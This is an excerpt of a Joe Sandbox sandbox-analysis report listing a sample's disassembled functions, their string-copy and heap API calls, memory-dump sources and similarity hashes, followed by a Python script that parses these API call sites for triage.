                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: 22f1a92d4c634207354e7ef5406156f982f44a16f7e7214f1abbaee2ce3c9ffb
                                  • Instruction ID: 76a8433a50ebcac5079ab5b84e814d48d85d04066f67afe7800e0194313d9f04
                                  • Opcode Fuzzy Hash: 22f1a92d4c634207354e7ef5406156f982f44a16f7e7214f1abbaee2ce3c9ffb
                                  • Instruction Fuzzy Hash: A0F0C9749517029FDB249F75D858927BAF9EF84B0131C982EAC9AC7354EB34F841CB20
                                  APIs
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 0d27412ed434dcdf7b7db72664b19b922b93a9b9e5b349ef7b315566579817c7
                                  • Instruction ID: 440703d554d4ad8796f3006321d93b1ff935f2d02a10adc01a288b8b1deb6b38
                                  • Opcode Fuzzy Hash: 0d27412ed434dcdf7b7db72664b19b922b93a9b9e5b349ef7b315566579817c7
                                  • Instruction Fuzzy Hash: 2A120B70A012059FDB2ACF19C554B35B7E5AF45718B1EC0AEE909CB3A2D776ED82CB40
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7CAF
                                    • Part of subcall function 003F7D40: std::_Xinvalid_argument.LIBCPMT ref: 003F7D58
                                    • Part of subcall function 003F7D40: std::_Xinvalid_argument.LIBCPMT ref: 003F7D76
                                    • Part of subcall function 003F7D40: std::_Xinvalid_argument.LIBCPMT ref: 003F7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: 4d87a0a0e1440b9b7551a449d3ab2a508d72d157b01313b1281520f9e56076ff
                                  • Instruction ID: a62ea02f1e2bd705a445aefbaa1a9b5f5652804387bf286251a9fda353dc34f8
                                  • Opcode Fuzzy Hash: 4d87a0a0e1440b9b7551a449d3ab2a508d72d157b01313b1281520f9e56076ff
                                  • Instruction Fuzzy Hash: F131E9723082184BD736DE6CE880E7AF7E9EF91750B21462BF6568B681D7719C4183A4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 003E6F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E6F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: d4e1488b8a3afb8e824b5f0bf922db4094553fb1f3732e5de77b718a5b05851c
                                  • Instruction ID: 0e96661c246759d5bca79cfae795d78c2b620056619716e2be1b5980fcefc405
                                  • Opcode Fuzzy Hash: d4e1488b8a3afb8e824b5f0bf922db4094553fb1f3732e5de77b718a5b05851c
                                  • Instruction Fuzzy Hash: 6C21AEB06007518BEB218B61DC85BB673E8EB54745F44497CF946CB6C0F774E946C750
                                  APIs
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000), ref: 003E162D
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E164F
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E1671
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E1693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: f8ee3216b64f7ade45872adb71664f9a856fc10b347d781c1224b87f4d85c2e3
                                  • Instruction ID: 9c6fd31c2f8bfd74e401d1851a5cbe1020bee62f86349718d7b3b866a8c12413
                                  • Opcode Fuzzy Hash: f8ee3216b64f7ade45872adb71664f9a856fc10b347d781c1224b87f4d85c2e3
                                  • Instruction Fuzzy Hash: 89310874A01B52AFC725DF3AC598952BBF5FF497047044A2EA896C3B90DB30F811CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 004015A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004015D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: same sixteen dump files as listed for the preceding function entry (base 003E0000 through 00A73000)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: f09723c9e2503c0408d9d0d70a94ac1d9988e8f220c0a9d6d6258904a3e67829
                                  • Instruction ID: 223902fb027d33c2111d10c62c1b29faaf923c28b8fcbc39c1276fd9ec10c119
                                  • Opcode Fuzzy Hash: f09723c9e2503c0408d9d0d70a94ac1d9988e8f220c0a9d6d6258904a3e67829
                                  • Instruction Fuzzy Hash: E3213C74601B029FD735DF3AC854A17B7F9AF44700B044A2EA486DBB90DB38F851CBA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003E162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: same sixteen dump files as listed for the preceding function entries (base 003E0000 through 00A73000)
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 550209d33ef11ab4900a504bc7f4201ff1e25ebdc4c6d7b1a01e035d57aa503e
                                  • Instruction ID: 6e00bba285572adc45dc446e4eb42e7be3647a8e8649d8fd3136e9c900cbf89f
                                  • Opcode Fuzzy Hash: 550209d33ef11ab4900a504bc7f4201ff1e25ebdc4c6d7b1a01e035d57aa503e
                                  • Instruction Fuzzy Hash: 64111FB4A117529BDB259F36D419927B7F8BF447017094A2DA896C7A80EB30F851CB60
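The APIs bullets in these function entries (direct calls, plus calls reached through a "Part of subcall function" prefix, each with a ref address) are the part of a Joe Sandbox function listing that is easiest to pivot on when cross-referencing the unpacked image in a disassembler. The following Python is an added example, not code from Joe Sandbox or from this report: it parses those bullets into call-site records, groups the call sites by the subcall function they belong to, and flags calls to length-unbounded copy routines such as lstrcpy, which this sample uses at every recorded call site. The sample listing inside the block is constructed from the lines shown in the entries above; the regular expression, the line format it assumes and the set of flagged API names are assumptions of the example, not anything the report defines.

```python
"""Parse the "APIs" bullets of a Joe Sandbox function listing into call-site records.

Added example; it is not part of Joe Sandbox or of this report. The line
format is inferred from the listing above; the regex and the set of
unbounded copy routines are assumptions of this example.
"""
import re
from collections import Counter, defaultdict

# Constructed from the function entries shown above (one function's direct
# calls plus the calls it reaches through subcall function 003E1610); the
# "Similarity" and "API ID" lines are included to show non-call lines are skipped.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000), ref: 003E162D
  • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E164F
  • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E1671
  • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E1693
• lstrcpy.KERNEL32(00000000,?), ref: 003E1557
• lstrcpy.KERNEL32(00000000,?), ref: 003E1579
• lstrcpy.KERNEL32(00000000,?), ref: 003E159B
• lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
Similarity
• API ID: lstrcpy
"""

# One API bullet: optional "Part of subcall function <addr>:" prefix, then
# <api>.<module>(<args>), ref: <addr>.  Addresses are hex as printed in the report.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Length-unbounded copy/concat routines worth a closer look during triage
# (assumption of this example: which names to flag is a reviewer's choice).
UNBOUNDED_COPY = {
    "lstrcpy", "lstrcpyA", "lstrcpyW", "lstrcat", "lstrcatA", "lstrcatW",
    "strcpy", "strcat", "wcscpy", "wcscat",
}


def parse_api_line(line):
    """Return a call-site record for one API bullet, or None for any other line."""
    m = API_LINE.match(line)
    if m is None:
        return None
    # "(00000000)" -> ["00000000"], "(00000000,?)" -> ["00000000", "?"], "()" -> []
    args = [a.strip() for a in m.group("args").split(",") if a.strip()]
    callee = m.group("callee")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
        "subcall_of": int(callee, 16) if callee else None,
    }


def parse_listing(text):
    """Collect every API bullet in a listing, in report order; other lines are skipped."""
    return [rec for rec in map(parse_api_line, text.splitlines()) if rec is not None]


def summarize(calls):
    """Group call sites: per API, direct vs. reached through a subcall, and flagged copies."""
    by_api = Counter(c["api"] for c in calls)
    direct_refs = sorted(c["ref"] for c in calls if c["subcall_of"] is None)
    via_subcall = defaultdict(list)
    for c in calls:
        if c["subcall_of"] is not None:
            via_subcall[c["subcall_of"]].append(c["ref"])
    flagged = sorted(c["ref"] for c in calls if c["api"] in UNBOUNDED_COPY)
    return {
        "by_api": dict(by_api),
        "direct_refs": direct_refs,
        "via_subcall": {k: sorted(v) for k, v in via_subcall.items()},
        "unbounded_copy_refs": flagged,
    }


if __name__ == "__main__":
    summary = summarize(parse_listing(SAMPLE_LISTING))
    print("calls per API:", summary["by_api"])
    print("direct call sites:", [f"{r:08X}" for r in summary["direct_refs"]])
    for callee, refs in summary["via_subcall"].items():
        print(f"via subcall {callee:08X}:", [f"{r:08X}" for r in refs])
    print("unbounded copies to review:", len(summary["unbounded_copy_refs"]))
```

The ref addresses are kept as integers so they can be compared directly against the dump's load base (003E0000 in the Memory Dump Source lines above) when re-basing into IDA; the "?" placeholders the report prints for arguments it could not resolve are preserved as-is rather than guessed at.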